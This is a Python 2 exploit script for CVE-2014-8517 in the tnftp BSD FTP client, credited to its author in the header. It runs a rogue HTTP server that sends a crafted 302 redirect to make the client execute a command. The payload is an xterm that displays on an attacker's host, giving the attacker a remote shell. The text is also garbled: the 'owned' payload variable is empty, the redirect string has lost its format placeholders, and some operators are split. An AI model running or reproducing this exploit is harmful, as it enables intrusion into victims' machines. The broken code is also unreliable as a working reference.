import os
import sys
import time
import socket
def usage():
print "CVE-2014-8517 tnftp exploit"
print "by dash@hack4.org in 29 Nov 2014"
print
print "%s <redirect ip> <redirect port> <reverse xterm ip>" % (sys.argv[ 0 ])
print "%s 192.168.1.1 81 192.168.2.1" % (sys.argv[ 0 ])
def webserveRedirect(redirect):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 )
s.bind(( "0.0.0.0" , 80 ))
s.listen( 3 )
h, c = s.accept()
print "[+] Sending redirect :>"
h.send(redirect)
s.close()
return 0
def deliverUgga(owned):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 )
s.bind(( "0.0.0.0" ,rport))
s.listen( 3 )
h, c = s.accept()
print "[+] Deliver some content (shell is spwaned now)"
h.send(owned)
s.close()
return 0
owned =
if (os.getuid())! = 0 :
print "[-] Sorry, you need root to bind port 80!"
sys.exit( 1 )
if len (sys.argv)< 3 :
usage()
sys.exit( 1 )
rip = sys.argv[ 1 ]
rport = int (sys.argv[ 2 ])
revip = sys.argv[ 3 ]
print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
print "[+] Dont forget to run Xnest -ac :1"
cmd = "xterm -display %s:1" % (revip)
cmd = cmd.replace( " " , "%20" )
print "[+] Payload: [%s]" % cmd
redirect = "HTTP/1.1 302\r\n" \
"Content-Type: text/html\r\n" \
"Connection: keep-alive\r\n" \
"\r\n\r\n" % (rip,rport,cmd)
uggapid = os.fork()
if uggapid = = 0 :
uggapid = os.getpid()
deliverUgga(owned)
else :
webpid = os.fork()
if webpid = = 0 :
webpid = os.getpid()
webserveRedirect(redirect)
try :
os.waitpid(webpid, 0 )
except :
pass
try :
os.waitpid(uggapid, 0 )
except :
pass
time.sleep( 5 )
|